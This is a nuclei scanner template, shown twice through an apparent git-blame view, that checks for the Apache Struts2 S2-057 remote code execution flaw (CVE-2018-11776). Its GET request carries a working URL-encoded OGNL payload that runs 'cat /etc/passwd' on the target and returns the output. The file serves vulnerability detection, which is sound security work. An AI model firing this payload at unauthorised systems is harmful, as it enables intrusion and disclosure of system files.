nuclei-templates/cves/2018/CVE-2018-11776.yaml

id: CVE-2018-11776

info:
  name: Apache Struts2 S2-057 RCE
  author: pikpikcu
  severity: critical
  reference: https://github.com/jas502n/St2-057
  tags: cve,cve2018,apache,rce,struts2

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
Create CVE-2018-11776.yaml 2021-02-24 04:29:30 +00:00			`id: CVE-2018-11776`

			`info:`
			`name: Apache Struts2 S2-057 RCE`
			`author: pikpikcu`
			`severity: critical`
			`reference: https://github.com/jas502n/St2-057`
			`tags: cve,cve2018,apache,rce,struts2`

			`requests:`
			`- method: GET`
			`path:`
			- "{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"

			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`
fixed trailing spaces 2021-03-05 20:44:21 +00:00
Create CVE-2018-11776.yaml 2021-02-24 04:29:30 +00:00			`- type: status`
			`status:`
			`- 200`